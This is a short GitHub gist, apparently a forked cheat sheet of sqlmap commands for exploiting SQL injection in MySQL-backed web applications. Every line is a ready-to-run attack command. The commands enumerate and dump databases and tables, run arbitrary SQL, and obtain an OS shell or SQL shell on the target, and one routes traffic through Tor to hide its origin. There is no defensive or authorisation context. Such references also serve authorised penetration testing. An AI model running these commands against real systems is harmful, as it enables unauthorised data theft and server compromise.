Skip to content

Instantly share code, notes, and snippets.

@manojkumar1053

manojkumar1053/sqlmap-cheat-sheet.md

Forked from jkullick/sqlmap-cheat-sheet.md
Created May 21, 2018 00:37
Show Gist options
  • Save manojkumar1053/0c7ab31f7a69377fe7ee7e47d8a5abbb to your computer and use it in GitHub Desktop.
Save manojkumar1053/0c7ab31f7a69377fe7ee7e47d8a5abbb to your computer and use it in GitHub Desktop.
Download ZIP
SQLMap Cheat Sheet
Raw
sqlmap-cheat-sheet.md 
# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs

# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables

# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump

# Specify parameter to exploit
sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2

# Specify parameter to exploit in 'nice' URIs
sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1

# Get OS shell
sqlmap --dbms=mysql -u "$URL" --os-shell

# Get SQL shell
sqlmap --dbms=mysql -u "$URL" --sql-shell

# SQL query
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"

# Use Tor Socks5 proxy
sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment